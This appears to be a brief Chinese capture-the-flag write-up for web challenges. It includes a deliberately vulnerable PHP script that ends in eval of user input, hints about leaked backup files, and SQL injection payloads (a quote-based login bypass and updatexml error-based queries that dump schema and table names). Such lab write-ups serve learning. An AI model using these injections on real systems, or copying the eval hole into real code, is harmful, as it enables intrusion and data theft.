HTTP
跟着提示一步一步走。

Head?Header!
同样是跟着提示。

NotPHP
<?php
error_reporting(0);
highlight_file(__FILE__);
if(file_get_contents($_GET['data']) == "Welcome to CTF"){
if(md5($_GET['key1']) === md5($_GET['key2']) && $_GET['key1'] !== $_GET['key2']){
if(!is_numeric($_POST['num']) && intval($_POST['num']) == 2077){
echo "Hack Me";
eval("#".$_GET['cmd']);
}else{
die("Number error!");
}
}else{
die("Wrong Key!");
}
}else{
die("Pass it!");
}

我真的会谢
robots.txt

在主页源码中已经提示vim出错,所以在.index.php.swp

最后一个在www.zip中

Word-For-You
' or '1'='1

Word-For-You(2 Gen)
测试后发现会报错,尝试报错注入成功。
爆库information_schema,mysql,performance_schema,wfy:
name='and+updatexml(1,substr(concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata)),0x7e),40,20),1)#
爆表wfy_admin,wfy_comments,wfy_info:
name='and+updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema="wfy")),0x7e)

1516

被折叠的 条评论
为什么被折叠?



